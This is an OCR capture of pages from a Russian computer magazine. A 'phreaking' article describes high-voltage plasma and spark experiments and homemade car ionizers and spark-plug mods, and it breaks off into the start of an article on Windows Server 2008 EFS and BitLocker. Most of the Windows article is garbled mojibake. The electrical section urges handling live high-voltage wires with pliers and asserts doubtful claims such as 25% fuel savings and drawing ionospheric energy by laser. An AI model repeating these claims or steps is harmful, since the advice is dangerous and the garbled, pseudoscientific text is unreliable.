Прилепил? Ты увидишь не единичные разряды, а «размазанный диск» — 

по сути, это и есть плазма. При высокой частоте, порядка 15 кГц, единичные 

удары размазываются в однородное поле, которое можно использовать, 

например, как среду для поджигания горючего. Фишка в том, что, если 

снизить частоту примерно до 300 Гц, то станешь свидетелем вращения 

электрической дуги в магнитном поле. Пока что у тебя в руках очень слабый 

трансформатор, но ничто не помешает тебе собрать трансформатор Тесла 

мощнее. Тем более, он относительно прост в изготовлении. 

ПРОКАЧАЕМ ПЛАЗМУ 

Вдоволь наигравшись, проведем следующий опыт: узнаем, насколько 

можно увеличить площадь получаемого плазменного поля. Для этого 

тебе понадобятся две ровные металлические пластины, порядка 

15х15 см, несколько колец из диэлектрика (например, на ура пройдут 

резиновые прокладки от раковины). Если с пластинами напряг, можешь 

XÀÊÅÐ 04 /124/ 09

phreaking 

использовать две металлические крышки для банок с бабушкиным 

вареньем. Теперь бери и собирай из этого барахла «пирамидку»: клади 

вниз под пластину оголенный провод, сверху пластину, затем диэлектрик, 

крышку и сверху — еще один электрод с магнитом. Результатом 

станет плазменное колечко, площадь которого значительно больше 

плазменного диска в предыдущем опыте — красота, да и только! Кстати, 

забыл сказать, что для своих опытов ты также можешь использовать 

искровой трансформатор из отечественных автомобилей старше 10-15 

лет. На выходе этого трансформатора мы будем иметь 10 кВ с частотой 

порядка 5 кГц. Для наших опытов вполне достаточно. 

РЕЗУЛЬТАТОМ СТАНЕТ 

ПЛАЗМЕННОЕ КОЛЕЧКО, 

ПЛОЩАДЬ КОТОРОГО 

ЗНАЧИТЕЛЬНО БОЛЬШЕ 

ПЛАЗМЕННОГО ДИСКА В 

ПРЕДЫДУЩЕМ ОПЫТЕ — 

КРАСОТА, ДА И ТОЛЬКО . 

ИОНИЗАЦИОННЫЙ ТОК 

Мы наигрались с плазмой, но есть более простые и не менее важные 

свойства высоковольтных токов. Возьми пассатижами два высоковольтных 

провода под напряжением (ïðî òåõíèêó áåçîïàñíîñòè íàïîìèíàòü 

íå íóæíî? — Ïðèì. ðåä.) и начинай их сближать. Прежде чем 

между ними начнет пробивать искра, ты сможешь насладиться характерным 

шипением и фиолетовым свечением на остриях проводников. 

Спрашивается, что в этом особенного? А вот что: ты наблюдаешь передачу 

энергии от одного электрода к другому. Напряжение в проводнике 

столь высоко, что между электродами возникает ионизационный ток. 

На самом деле, это очень прикольная штука, которую сейчас в стенах 

военных лабораторий пытаются использовать для полета самолетов. 

Подобный ионизационный поток может утягивать за собой небольшие 

частицы. В роли частиц могут выступать, например, воздух или вода. 

Ионизационный поток или, как его еще иногда называют, «фитонное 

свечение», можно усилить, подведя к концу иголки колечко или, скажем, 

сетку. Это явление уже активно применяется в краскопультах. Есть так 

называемая электростатическая покраска машин — основана на эффекте 

распыления жидкости, вытекающей из положительно заряженной 

трубки малого диаметра при направлении ее на отрицательно заряженную 

поверхность. В качестве такой трубки, распыляющей воду, можно 

заюзать шприц без поршня. Просто присоедини к иголке шприца положительный 

электрод и подай минус на металлическую пластину. Стоит 

тебе включить высоковольтный источник постоянного тока, — и вода из 

шприца перестанет капать, а начнет очень мелко распыляться. Именно 

так в современном автомобилестроении добиваются высококачественной, 

равномерной покраски деталей. Упомяну и о летающей платформе 

Гребенникова, но распространяться о ней не буду, так как статья всего 

лишь обзорная. 

Еще я хотел бы сказать о самом процессе протекания электрического 

тока в воздушных средах. Всей сложностью и нелинейностью законов 

распространения электрического заряда в воздухе грузить не буду, но 

пару слов сказать все-таки надо. 

Электрическая дуга, как ни крути, это, прежде всего, резистор, который 

выделяет тепло. У нее есть свое сопротивление, которое надо учитывать. 

Так, если ты будешь пытаться делать очень короткие искры блоком питания 

от своего старого монитора, то он может посчитать это замыканием 

и либо вынести тебя на срабатывание защиты, что на практике счастье 

небесное, либо сгореть. Дуга подчиняется закону Ома, но только на очень 

коротком ее участке. Для более детального изучения электрические 

свойства описывают с помощью вольтамперной характеристики. Одну 

из таких характеристик ищи на врезке. Но приведенная картинка не 

учитывает таких разнообразных факторов, как состав, давление испытуемого 

газа, воздействий на газ, материала и расположения электродов, 

форм электродов, геометрии возникающего электрического поля в газе. 

Несмотря на то, что этот вопрос и его феномены изучали не одна тысяча 

человек в различных НИИ и лабораториях, все равно остались «белые 

пятна». 

ПРИМЕНЯЕМ ПРИКОЛЫ НА ПРАКТИКЕ 

Из вышеописанного следует, что ты с 100% успехом можешь сделать 

апгрейд своей машины, доработав свечи зажигания по указанной технологии. 

Есть спортивные свечи зажигания, уже специально заточенные 

под эту фишку, но их создатели, видимо, не знали про влияние магнитного 

поля на дуговой разряд. Как показали замеры расхода топлива 

у моих знакомых, внедрение технологии позволило экономить топливо 

порядка 25% и повысить мощность движка примерно на 15%. 

А теперь вот такой опыт — для него потребуется постоянное напряжение, 

но это не составит для тебя никакой проблемы, если ты читал статью 

за прошлый месяц. Берем канализационную пластиковую трубу 50 

мм в диаметре. Нам нужен обрезок длиной примерно 

№ 1 № 2 №3 

МОДЕРНИЗИРОВАННАЯ 

АВТОМОБИЛЬНАЯ 

СВЕЧА, ПИТАЕМАЯ 

РОДНЫМ ИСТОЧНИКОМ 

ПРИ РАЗНЫХ ОБОРОТАХ 

ДВИГАТЕЛЯ 

XÀÊÅÐ 04 /124/ 09 

103

pc_zone phreaking 

104 

КАКИЕ ВИДЫ РАЗРЯДОВ 

ИЗУЧЕНЫ? 

Как ты уже догадался, электрический 

разряд — штука весьма неоднозначная 

и зависящая от целого ряда 

факторов. Различают множество 

разрядов, которые классифицируются 

по механизмам их возникновения. 

Электрические разряды подразделяются 

на: 

• Искровой разряд. В предыдущей 

статье я про него очень много писал и, 

вообще, увидеть этот разряд своими 

глазами — не редкость. Как правило, 

он высокочастотный, возникает при 

относительно малой силе тока (до 10 

mA) и большом напряжении, порядка 

10 кВ и выше. 

• Коронный разряд. По сути, это 

свечение проводника, обладающего 

меньшей площадью пробоя, при его 

приближении к другому контакту под 

напряжением. Фишка этого разряда 

в том, что при больших частотах он 

может быть очень плотным. Во время 

возникновения коронного разряда 

появляется так называемый «электрический 

ветер», скорость которого 

может достигать 10 м/с, в зависимости 

от конструкционных особенностей. 

Считают, что в платформе Гребенникова 

использовался именно этот вид 

разряда. 

• Скользящий разряд. Особенностью 

скользящего разряда является его 

протяженность. При тех же самых 

условиях, что и у искрового разряда, 

он может быть в 10 раз длиннее. 

Вероятно, это связано со своего рода 

«отражением» искры от теплостойкого 

отполированного диэлектрика. 

Но поскольку таких теплостойких 

непроводящих материалов очень 

мало в природе, — феномен до сих пор 

малоизучен. Применяется в фильтрах 

и осушителях. 

• Газовый разряд. Самым важным 

применением этих разрядов, 

пожалуй, является электроискровая 

обработка металлов и обеззараживание 

воды. Отмечу и такое явление, 

как гидроудар — резкое расширение 

воды, сопровождаемое выделением 

тепла и частичным испарением. Он 

настолько силен, что горняки сокрушают 

им каменные глыбы, просто 

просверлив в неподатливой породе 

отверстие, залив воду и вставив спецтрубку 

с электродами. Как результат, 

глыба разлетается на относительно 

небольшие куски. Ударная волна 

гораздо мощнее, чем у бензина или, 

скажем, у того же динамита. На эту 

тему написано достаточно много. Интересно 

было бы создать такой клапан 

для двигателя внутреннего сгорания, 

который позволял бы распределять 

резко выделяющуюся энергию. 

• Тлеющий разряд. Как правило, это 

высокочастотный разряд, возникающий 

при переменном токе высокого 

напряжения. Подобный эффект 

наблюдается в разреженной газовой 

среде. Наиболее наглядный пример 

— плазменная лампа. В магазине 

я видел такую игрушку, стоила 400 

рублей. 

• Дуговой разряд. Электродуговая 

сварка — первое, что приходит 

в голову, когда говорят о дуговом 

разряде. Возникает он при сравнительно 

небольших напряжениях, но 

при относительно большой силе тока 

(так, на выходе моего домашнего 

трехфазного сварочного трансформатора 

написано «300В 20А»). Его можно 

наблюдать при коротком замыкании 

в сети 220 вольт. Явление сопровождается 

сильным тепловыделением и 

плавлением электродов. 

• Оптический разряд. Пожалуй, 

самый интересный тип разрядов. Не 

открою тайну, сказав, что лазер является 

точечным ионизатором. Точнее, 

по лазеру можно передавать энергию, 

как будто у нас в руках обыкновенный 

провод. Единственный минус 

— необходима большая мощность 

лазера. В США сейчас предпринимаются 

активные попытки снять 

высокопотенциальное напряжение из 

ионосферы планеты. Идея заключается 

в том, чтобы по очень мощному 

лазерному лучу снимать энергию, 

которой бы хватило и на работу лазера, 

и на обеспечение населения почти 

бесплатным, экологически чистым 

электричеством. 

25-30 см. Теперь необходимо изнутри проклеить ее фольгой 

— и точно по центру, параллельно внутренним стенкам, 

протянуть кусок неизолированной, толстой медной проволоки. 

Выведи контакты площадей на внешний корпус этой 

трубы и постарайся вмонтировать ее в гофрошланг, идущий 

от воздушного фильтра к мотору. Зачем все это? А вот 

зачем: если ты разберешь телевизор или CRT-монитор, то 

высоковольтные элементы в нем будут самыми пыльными. 

А происходит это потому, что высокое напряжение в физике 

есть некий аналог электростатического напряжения. 

Иными словами, — наша самоделка будет очищать воздух, 

поступающий в сердце твоего зверя, от лишней пыли, если 

к ней правильно подключить автомобильный ионизатор 

воздуха (видел такой агрегат за 900 рублей в продаже). 

«Правильно» — это значит: минусом к фольге, а плюсом к 

центральной проволочке. Как результат, смесь, заряженная 

таким воздухом, воспламеняется заметно лучше. Тебя 

также порадует экономия топлива (порядка 15%) и более 

резвое поведение твоей машины на подъемах. 

«ПРАВИЛЬНО» — ЭТО 

ЗНАЧИТ: МИНУСОМ К 

ФОЛЬГЕ, А ПЛЮСОМ К 

ЦЕНТРАЛЬНОЙ ПРОВО- 

ЛОЧКЕ.. КАК РЕЗУЛЬТАТ, 

СМЕСЬ, ЗАРЯЖЕННАЯ 

ТАКИМ ВОЗДУХОМ, ВОС- 

ПЛАМЕНЯЕТСЯ ЗАМЕТНО 

ЛУЧШЕ. 

О ЗДОРОВЬЕ И ЗДРАВОМ СМЫСЛЕ 

Мы вкратце рассмотрели (а частично — даже применили 

на практике) такие интересные явления, как ионизация, 

дуговой разряд и вращение дуги. Машина моего знакомого 

уже работает с приведенными выше модификациями. 

Это реально оказывает положительный эффект в работе 

двигателя внутреннего сгорания. Старайся грамотно 

оценить и рассчитать требуемую мощность конечной 

установки, иначе суровая действительность ударит 

тебя не только по кошельку, но и по здоровью. Во время 

возникновения дугового разряда, или хотя бы слабого 

ионизационного свечения, из проводника вырываются 

не только электроны или ионы. Из проводника вылетает 

весь спектр частиц, начиная от жесткого ультрафиолета 

и заканчивая слабым рентген излучением. А это значит, 

что повторять эти опыты на протяжении длительного 

времени не стоит, равно, как и изготавливать ночники из 

трансформатора Тесла. Ну не для того он предназначен. 

С другой стороны, если рассмотреть те же ионизаторы 

воздуха, где все рассчитано в пределах допустимых норм, 

то вполне реально создать такое устройство, которое 

одновременно решало бы какую-то определенную 

проблему — и было бы безвредно для человека. Ты же не 

собираешься строить девайс для уничтожения людей под 

лозунгом «облучи себя сам»? z 

XÀÊÅÐ 04 /124/ 09

phreaking 

МОДЕРНИЗИРОВАННЫЙ 

АВТОФИЛЬТР. 

1.Металлический корпус, снаружи желательно 

изолировать. 

2. Металлический электрод. 

3. Крепления электрода. 

4. Изолирующее крепление электрода. 

5. Провода высокого напряжения — к корпусу (+) , 

к стержню (-). Недостаток: на электроде быстро 

скапливается пыль. Ставится непосредственно 

при входе воздуха; карбюратор — перед фильтром; 

инжектор — после фильтра. 

ОБЩАЯ ВОЛЬТАМПЕРНАЯ ХАРАКТЕРИСТИКА 

РАЗРЯДОВ 

ВОЛЬТАМПЕРНАЯ ХАРАКТЕРИСТИКА 

ТИХОГО РАЗРЯДА 

XÀÊÅÐ 04 /124/ 09 

105

SYN/ACK 

СЕРГЕЙ «GRINDER» ЯРЕМЧУК 

/ CORE@SYNACK.RU / 

За семью 

печатями 

Win2k8: средства и инструменты безопасности 

Принципы, заложенные в Win2k8, позволяют достичь уровня безопасности 

более высокого, чем когда-либо. Усиление защиты никак 

не сказалось на управляемости, — наоборот, многие настройки стали 

проще и понятнее. В этом легко убедиться, разобрав по косточкам 

встроенные механизмы шифрования и административные шаблоны, 

позволяющие удаленно настраивать параметры безопасности и системный 

реестр клиентских компов. 

>> SYN/ACK 

106 

ШИФРУЮЩАЯ ФАЙЛОВАЯ СИСТЕМА EFS Ñåãîäíÿ ìíîãî ãîâîðÿò 

î ïîòåðÿõ öåííîé èíôîðìàöèè èç-çà íåñàíêöèîíèðîâàííîãî äîñòóïà 

ê ñèñòåìå èëè áàíàëüíîé êðàæè ñèñòåìíîãî áëîêà. Â Win2k8 âñòðîåíû 

ñðåäñòâà, êîòîðûå ïîçâîëÿþò ñîçäàòü çàøèôðîâàííûé ôàéë, êàòàëîã èëè 

ðàçäåë. Äàííûå, çàùèùåííûå òàêèì îáðàçîì, ìîãóò áûòü ïðî÷èòàíû 

òîëüêî òåìè ïîëüçîâàòåëÿìè, êîòîðûå èìåþò ê íèì äîñòóï. Äëÿ øèôðîâàíèÿ 

ôàéëîâ è êàòàëîãîâ èñïîëüçóåòñÿ øèôðîâàííàÿ ôàéëîâàÿ ñèñòåìà 

EFS (Encrypting File System), ïîääåðæèâàåìàÿ âñåìè ÎÑ Microsoft, 

íà÷èíàÿ ñ Win2k. Ñ êàæäîé íîâîé âåðñèåé ñèñòåìû ýòà òåõíîëîãèÿ ñîâåðøåíñòâóåòñÿ, 

èçìåíÿþòñÿ àëãîðèòìû è äëèíà êëþ÷åé. Òàê, â Win2k8 ðåàëèçîâàíî 

õðàíåíèå êëþ÷åé øèôðîâàíèÿ íà ñìàðò-êàðòàõ, øèôðîâàíèå 

êëèåíòñêîãî êýøà è ôàéëà ïîäêà÷êè, ïðåäóñìîòðåíî öåíòðàëèçîâàííîå 

àäìèíèñòðèðîâàíèå ïîëèòèê EFS, à òàêæå óïðîùåíî îáíîâëåíèå êëþ÷åé 

øèôðîâàíèÿ. 

Ôàêòè÷åñêîå øèôðîâàíèå äàííûõ â Win2k8 ïðîèçâîäèòñÿ ïðè ïîìîùè 

ñèììåòðè÷íîãî àëãîðèòìà AES ñ 256-ðàçðÿäíûì êëþ÷îì (àëüòåðíàòèâíî 

3DES, DESX). Ýòî îáåñïå÷èâàåò âûñîêóþ ñêîðîñòü ðàáîòû. Ó÷èòûâàÿ, 

÷òî EFS ðàáîòàåò íà óðîâíå äðàéâåðà NTFS, íàêëàäíûå ðàñõîäû íà øèôðîâàíèå/ðàñøèôðîâêó 

äàííûõ íåâåëèêè. Â ïðîöåññå ðàáîòû èñïîëüçóåòñÿ 

ñëó÷àéíûé äëÿ êàæäîãî ôàéëà êëþ÷ FEK (File Encryption Key). Ñàì FEK 

øèôðóåòñÿ îòêðûòûìè êëþ÷àìè ïîëüçîâàòåëÿ-âëàäåëüöà è àäìèíèñòðàòîðà 

âîññòàíîâëåíèÿ (â Win2k8 èñïîëüçóåòñÿ àññèìåòðè÷íûé àëãîðèòì 

RSA 2048 áèò). Îáðàçîâàííûå ïîñëå ýòîãî äâà âàðèàíòà êëþ÷åé ñîõðàíÿþòñÿ 

â âèäå àòðèáóòà DDF (Data Decryption Field, ïîëå øèôðîâàíèÿ äàííûõ) 

â àëüòåðíàòèâíîì ïîòîêå $EFS ôàéëîâîé ñèñòåìû NTFS. 

Äëÿ ïîëüçîâàòåëÿ, ñîçäàâøåãî çàøèôðîâàííûé ôàéë èëè êàòàëîã, ïðîöåññ 

ïîëíîñòüþ ïðîçðà÷åí: îí ðàáîòàåò ñ òàêèìè ôàéëàìè, êàê ñ îáû÷íûìè. 

Âñå îñòàëüíûå, ïðè ïîïûòêå îòêðûòü òàêîé ôàéë, ïîëó÷àò îòêàç â 

äîñòóïå. Èñêëþ÷åíèå ñîñòàâëÿåò ëèøü àãåíò âîññòàíîâëåíèÿ êëþ÷à (ïî 

óìîë÷àíèþ — àäìèíèñòðàòîð ëîêàëüíûé èëè äîìåíà), êîòîðûé ìîæåò 

âîññòàíîâèòü çàøèôðîâàííûé ôàéë â ñëó÷àå ïîòåðè èëè ñáðîñà ïàðîëÿ 

ïîëüçîâàòåëÿ. Åñëè ñêîïèðîâàòü çàøèôðîâàííûé ôàéë èëè êàòàëîã íà 

ôàéëîâóþ ñèñòåìó, íå ïîääåðæèâàþùóþ EFS (íàïðèìåð, ôëåøêó, îòôîðìàòèðîâàííóþ 

â FAT32), ïîÿâèòñÿ îêíî ïîäòâåðæäåíèÿ ïîòåðè øèôðîâàíèÿ. 

Ïîñëå ïîäòâåðæäåíèÿ ôàéë ïåðåìåùàåòñÿ â îáû÷íîì âèäå è ìîæåò 

áûòü ïðî÷èòàí âñåìè ïîëüçîâàòåëÿìè. 

Ñòàíäàðòíîå âêëþ÷åíèå EFS â Win2k8 âûãëÿäèò òàê. Â îêíå ñâîéñòâ ôàéëà 

èëè êàòàëîãà âûáèðàåì âêëàäêó «Îáùèå» è âûçûâàåì îêíî «Äîïîëíèòåëüíûå 

àòðèáóòû» (Advanced Attributes), íàæàâ êíîïêó «Äðóãèå». Çàòåì 

óñòàíàâëèâàåì ïåðåêëþ÷àòåëü â ïîëå «Øèôðîâàòü ñîäåðæèìîå äëÿ çàùèòû 

äàííûõ» (Encrypt contents to secure data) è ùåëêàåì «Ïðèìåíèòü». 

Ïîñëå òîãî êàê äàííûå çàøèôðîâàíû, â òîì æå îêíå «Äîïîëíèòåëüíûå 

àòðèáóòû» ìîæíî äîáàâèòü ïîëüçîâàòåëåé, êîòîðûå äîëæíû èìåòü ê íèì 

äîñòóï. 

Â êîìïëåêòå ïîñòàâêè åñòü è êîíñîëüíàÿ óòèëèòà cipher.exe, ïîçâîëÿþùàÿ 

ðàáîòàòü ñ EFS-äàííûìè â êîìàíäíîé ñòðîêå. Ââîä åå áåç ïàðàìåòðîâ 

âûäàñò ñïèñîê ôàéëîâ â òåêóùåì êàòàëîãå. Áóêâà íà ïåðâîé ïîçèöèè ïîêàçûâàåò 

íà — «E» (çàøèôðîâàííûé) è «U» (íåçàøèôðîâàííûé) ôàéë. 

×òîáû ïîëó÷èòü ïîëíûé ñïèñîê âñåõ ïàðàìåòðîâ óòèëèòû, ñëåäóåò íàáðàòü 

«cipher /?». 

Àêòèâèðîâàòü EFS ìîæíî äëÿ ëþáîãî ôàéëà èëè êàòàëîãà, èñêëþ÷åíèå 

ñîñòàâëÿþò ëèøü ñèñòåìíûå è ñæàòûå ôàéëû. Óñòàíîâèòü ïåðåêëþ÷àòåëü 

îäíîâðåìåííî â ïîëîæåíèå, àêòèâèðóþùåå øèôðîâàíèå è ñæàòèå 

(«Ñæèìàòü ñîäåðæèìîå äëÿ ýêîíîìèè ìåñòà íà äèñêå»), íåâîçìîæíî. 

Åñëè íóæíî çàøèôðîâàòü äàííûå â ñæàòîì êàòàëîãå, ïðîñòî ïåðåêëþ÷àåì 

ôëàæîê, ïîñëå ÷åãî â ïîÿâèâøåìñÿ îêíå èçìåíåíèÿ àòðèáóòîâ ïðèìåíÿåì 

óñòàíîâêè êî âñåì âëîæåííûì ôàéëàì è êàòàëîãàì. Íî ó÷òè, äðóãèå 

ïîëüçîâàòåëè, õðàíèâøèå ôàéëû â êàòàëîãå, ïîñëå ýòîé îïåðàöèè óæå íå 

áóäóò èìåòü ê íèì äîñòóï :). Â ôàéëîâîì ìåíåäæåðå çàøèôðîâàííûå êàòàëîãè 

ïîäñâå÷èâàþòñÿ çåëåíûì öâåòîì, ñæàòûå — ñèíèì, ïîýòîìó èõ 

õîðîøî âèäíî. 

Åñëè ïîëüçîâàòåëü íå èìååò ñåðòèôèêàòà EFS, ïðè ïåðâîì çàïóñêå îí 

áóäåò ñîçäàí àâòîìàòè÷åñêè. Ïðîñìîòðåòü âñå âûäàííûå ïîëüçîâàòåëþ 

ñåðòèôèêàòû ìîæíî âî âêëàäêå «Ëè÷íîå» (Personal) êîíñîëè «Ñåðòèôèêàòû» 

(certmgr.msc). Ñðåäè îñòàëüíûõ ñåðòèôèêàòîâ îòëè÷èòü íóæíûé 

ìîæíî ïî ïîëþ «Íàçíà÷åíèå» — «Ôàéëîâàÿ ñèñòåìà EFS». Íî çäåñü åñòü 

XÀÊÅÐ 04 /124/ 09

SYN/ACK 

îäèí ìîìåíò, î êîòîðîì íóæíî çíàòü. Åñëè êîìïüþòåð íå ïîäêëþ÷åí ê 

äîìåíó, âûäàííûé òàêèì îáðàçîì ñåðòèôèêàò íå áóäåò îáîçíà÷åí êàê 

Trusted. ×òîáû âêëþ÷èòü «Äîâåðèå», íåîáõîäèìî äîáàâèòü òàêîé ñåðòèôèêàò 

â öåíòð ñåðòèôèêàöèè. Ñàìûì ïðîñòûì âûõîäîì áóäåò óñòàíîâêà 

â òîé æå ñèñòåìå ñëóæáû ñåðòèôèêàöèè AD CS (Active Directory Certificate 

Services). Â ýòîì ñëó÷àå ñàìîñòîÿòåëüíî ñãåíåðèðîâàííûå ñåðòèôèêàòû 

áóäóò àâòîìàòè÷åñêè ïðèíèìàòüñÿ êàê äîâåðåííûå. Ñîçäàòü ñåðòèôèêàò 

äëÿ EFS ïðè ïîìîùè êîíñîëè «Ñåðòèôèêàòû» äîâîëüíî ïðîñòî. Íàõîäÿñü 

â ðàçäåëå «Ëè÷íîå», èç êîíòåêñòíîãî ìåíþ âûçûâàåì ìàñòåð ïîäà÷è çàÿâîê 

íà ñåðòèôèêàòû è ñëåäóåì åãî ðåêîìåíäàöèÿì. 

Åñëè êëþ÷ øèôðîâàíèÿ óòåðÿí èëè ïîâðåæäåí è íåò âîçìîæíîñòè åãî 

âîññòàíîâèòü, à òàêæå â òîì ñëó÷àå, åñëè ïîëüçîâàòåëüñêèé ïàðîëü áûë 

ñáðîøåí, ïîëó÷èòü äîñòóï ê çàøèôðîâàííûì äàííûì íåâîçìîæíî. ×òîáû 

íå ïîòåðÿòü èíôîðìàöèþ, ñèñòåìà ïðåäëàãàåò íåñêîëüêî âàðèàíòîâ 

ïîäñòðàõîâêè. Ñðàçó æå ïîñëå ñîçäàíèÿ ïåðâîãî çàøèôðîâàííîãî ôàéëà 

ïîÿâèòñÿ çàïðîñ íà ñîçäàíèå àðõèâíîé êîïèè êëþ÷à è ñåðòèôèêàòà. 

Äîñòàòî÷íî âûáðàòü «Àðõèâèðîâàòü ñåé÷àñ» è ïðè ïîìîùè ìàñòåðà ýêñïîðòà 

ñåðòèôèêàòîâ ñîõðàíèòü ñåðòèôèêàò â ôàéë îáìåíà ëè÷íîé èíôîðìàöèåé 

(.pfx). ×òîáû ðåçåðâíàÿ êîïèÿ íå ñòàëà ïðîáëåìîé, â öåëÿõ 

îáåñïå÷åíèÿ áåçîïàñíîñòè àðõèâíûé ôàéë äîïîëíèòåëüíî çàùèùàåòñÿ 

ïàðîëåì. Àíàëîãè÷íûé ìàñòåð ìîæíî âûçâàòü èç êîíñîëè certmgr.msc. È, 

íàêîíåö, òðåòèé âàðèàíò — àãåíò âîññòàíîâëåíèÿ êëþ÷à. 

БИТОВЫЙ ЗАМОК Íîâàÿ òåõíîëîãèÿ BitLocker, âïåðâûå ïîÿâèâøàÿñÿ â 

Vista, â âåðñèÿõ Ultimate/Enterprise, ñòàëà ïðîäîëæåíèåì èäåè, çàëîæåííîé 

â EFS. Åå ãëàâíîå îòëè÷èå — óìåíèå øèôðîâàòü öåëûé òîì (òîì â òåðìèíîëîãèè 

Windows — ëîãè÷åñêàÿ ñòðóêòóðà, êîòîðàÿ ìîæåò ñîñòîÿòü 

èç îäíîãî èëè íåñêîëüêèõ ðàçäåëîâ). Êðîìå äàííûõ, âîçìîæíî øèôðîâàíèå 

ðååñòðà, ôàéëîâ ïîäêà÷êè è ãèáåðíàöèè. Òàê æå, êàê è EFS, ðàáîòà 

BitLocker ïîëíîñòüþ ïðîçðà÷íà äëÿ ïîëüçîâàòåëÿ, è øèôðîâàíèå ïðàêòè÷åñêè 

íå ñêàçûâàåòñÿ íà ïðîèçâîäèòåëüíîñòè ñèñòåìû. Ïî óìîë÷àíèþ 

äëÿ øèôðîâàíèÿ èñïîëüçóåòñÿ àëãîðèòì AES ñ 128-ðàçðÿäíûì êëþ÷îì. 

Ñ ïîìîùüþ ãðóïïîâûõ ïîëèòèê èëè ÷åðåç WMI (manage-bde.wsf) ðàçìåð 

êëþ÷à ìîæíî óâåëè÷èòü äî 256 áèò. Íàèáîëüøèé ýôôåêò ïðè èñïîëüçîâàíèè 

BitLocker äîñòèãàåòñÿ íà ïëàòôîðìàõ, ïîääåðæèâàþùèõ ñïåöèôèêàöèþ 

TPM (Trusted Platform Module). TPM-ìèêðîêîíòðîëëåð ñïîñîáåí 

ñîçäàâàòü è õðàíèòü áåçîïàñíûå êëþ÷è, à èíôîðìàöèþ, çàùèùåííóþ 

ïðè ïîìîùè òàêèõ êëþ÷åé, ìîæíî ïðî÷èòàòü òîëüêî íà óñòðîéñòâàõ, ïîääåðæèâàþùèõ 

ÒÐÌ. 

Ïðè ïîìîùè BitLocker ìîæíî çàøèôðîâàòü ñèñòåìíûé òîì, íî äëÿ åãî 

ðàáîòû ïîòðåáóåòñÿ, ìèíèìóì, äâà òîìà, îòôîðìàòèðîâàííûõ â NTFS. 

Îäèí áóäåò èñïîëüçîâàí ñîáñòâåííî äëÿ óñòàíîâêè ñèñòåìû, à íà âòîðîì 

(â íåçàøèôðîâàííîì âèäå) ðàçìåñòÿòñÿ çàãðóçî÷íûé ñåêòîð, äèñïåò÷åð 

çàãðóçêè è çàãðóç÷èê Windows. Ó÷èòûâàÿ âîçìîæíîñòü ñîçäàíèÿ ðàçëè÷íîãî 

ðîäà âðåìåííûõ ôàéëîâ, ðàçìåð àêòèâíîãî ðàçäåëà ðåêîìåíäóåòñÿ 

óñòàíîâèòü íå ìåíåå 1.5 Ãá. Åñëè ýòà ñõåìà ïðè óñòàíîâêå íå ðåàëèçîâàíà, 

òî êîíñîëü BitLocker ïîñëå çàïóñêà îòêàæåòñÿ ðàáîòàòü è âûäàñò ïðåäóïðåæäåíèå. 

Äëÿ ïîäãîòîâêè äèñêà äÿäüêè èç Microsoft ðåêîìåíäóþò 

èñïîëüçîâàòü BitLocker Drive Preparation Tool (support.microsoft.com/ 

kb/933246). 

Íóæíî îòìåòèòü, ÷òî íåçàøèôðîâàííûé ðàçäåë — íàèáîëåå óÿçâèì, òàê 

êàê çäåñü ìîæíî ñïðÿòàòü ðóòêèò, êîòîðûé ìîæåò ñòàðòîâàòü äî çàãðóçêè. 

Â ñèñòåìàõ, ïîääåðæèâàþùèõ TPM, îáåñïå÷èâàåòñÿ êîíòðîëü öåëîñòíîñòè 

ñèñòåìíûõ ôàéëîâ è íà ýòàïå çàãðóçêè. Åñëè êîìïîíåíòû èçìåíåíû, 

Windows ïîïðîñòó íå ñòàíåò ðàáîòàòü. 

Äëÿ äîñòóïà ê çàøèôðîâàííîìó ðàçäåëó íåîáõîäèìî èñïîëüçîâàòü 

TPM, PIN-êîä èëè USB-êëþ÷ ñ âîçìîæíîñòüþ êîìáèíàöèè ýòèõ ìåòîäîâ. 

Åñòåñò âåííî, ñàìûé çàùèùåííûé âàðèàíò âêëþ÷àåò èõ âñå: TPM + PINêîä 

+ USB-êëþ÷. Ñàì êëþ÷ ìîæåò õðàíèòüñÿ â TPM èëè â USB-óñòðîéñòâå. 

Â ñëó÷àå ñ TPM ïðè çàãðóçêå êîìïüþòåðà êëþ÷ ìîæåò ëèáî áûòü ïîëó÷åí 

èç íåãî ñðàçó, ëèáî òîëüêî ïîñëå àóòåíòèôèêàöèè ñ ïîìîùüþ USB-êëþ÷à 

èëè ââîäà PIN-êîäà. 

Êîìïîíåíò BitLocker âõîäèò â ñîñòàâ ÎÑ, íî ïî óìîë÷àíèþ íå óñòàíàâëèâàåòñÿ. 

Àêòèâèðóåòñÿ îí òðàäèöèîííûì äëÿ Win2k8 ñïîñîáîì — ïðè 

ïîìîùè Äèñïåò÷åðà ñåðâåðà. Ùåëêàåì ññûëêó «Äîáàâèòü êîìïîíåíòû», â 

îêíå ìàñòåðà îòìå÷àåì ôëàæîê «Øèôðîâàíèå äèñêà BitLocker» (BitLocker 

Drive Encrypion). Ïî îêîí÷àíèè óñòàíîâêè ïîòðåáóåòñÿ ïåðåçàãðóçêà ñèñòåìû. 

Èëè â êîìàíäíîé ñòðîêå íàáèðàåì: 

> ServerManagerCmd -install BitLocker -restart 

Åñëè îáîðóäîâàíèå ïîääåðæèâàåò TPM, ïîñëå ïåðåçàãðóçêè ñèñòåìû 

çàïóñêàåì êîíñîëü «Óïðàâëåíèå äîâåðåííûì ïëàòôîðìåííûì ìîäóëåì 

TPM» (tpm.msc). Îáíàðóæåííûé ìîäóëü áóäåò âûâåäåí â îñíîâíîì îêíå, 

èíèöèàëèçèðóåì åãî, íàæàâ ñîîòâåòñòâóþùóþ êíîïêó. Çàòåì ïî çàïðîñó 

ñîçäàåì ïàðîëü âëàäåëüöà TPM è ñîõðàíÿåì íà ñìåííûé íîñèòåëü. Ñîáñòâåííî 

àêòèâàöèÿ BitLocker ïðîèçâîäèòñÿ â êîíñîëè «Øèôðîâàíèå äèñêà 

BitLocker» (BitLocker Drive Encryption), êîòîðàÿ íàõîäèòñÿ â «Ïàíåëè óïðàâëåíèÿ». 

Çäåñü âñå ïðîñòî. Îòìå÷àåì íóæíûé òîì, ùåëêàåì «Âêëþ÷èòü 

BitLocker» (Turn On BitLocker) è âûáèðàåì îäèí èç ñïîñîáîâ ñîõðàíåíèÿ 

ïàðîëÿ âîññòàíîâëåíèÿ (USB, íà äèñê èëè ðàñïå÷àòàòü). Èç ýòîé æå êîíñîëè 

ìîæíî âðåìåííî èëè ïîëíîñòüþ îòêëþ÷èòü BitLocker. 

XÀÊÅÐ 04 /124/ 09 

107

SYN/ACK 

Компонент BitLocker входит в состав ОС, но по умолчанию 

не устанавливается 

В системе без TPM перед использованием BitLocker следует изменить 

групповые политики 

info 

• Для преобразования 

